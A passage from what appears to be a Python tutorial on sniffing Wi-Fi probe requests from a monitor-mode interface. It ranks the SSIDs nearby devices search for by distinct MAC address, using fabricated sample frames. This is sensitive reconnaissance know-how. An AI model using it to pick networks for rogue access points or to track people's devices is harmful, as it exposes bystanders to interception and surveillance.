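    build_probe_request("02:00:00:00:00:02", "attwifi"),
    build_probe_request("02:00:00:00:00:03", "attwifi"),
    build_probe_request("02:00:00:00:00:01", "attwifi"),   # duplicate device
    build_probe_request("02:00:00:00:00:04", "CableWifi"),
    build_probe_request("02:00:00:00:00:05", "CableWifi"),
    build_probe_request("02:00:00:00:00:06", ""),          # wildcard, ignored
    b"\x80\x00" + b"\x00" * 30,                            # beacon-shaped, ignored
]

if __name__ == "__main__":
    for ssid, count in rank_ssids(SAMPLE_FRAMES):
        print(f"{ssid} {count}")
```

When reading from a monitor-mode interface the frames arrive with a radiotap header in front; its total length is the little-endian 16-bit value at bytes 2-3, so skip that many bytes before handing the frame to `parse_probe_request`. Ranking on distinct MACs rather than raw probe count is what keeps one chatty phone from pushing its home SSID to the top of the list.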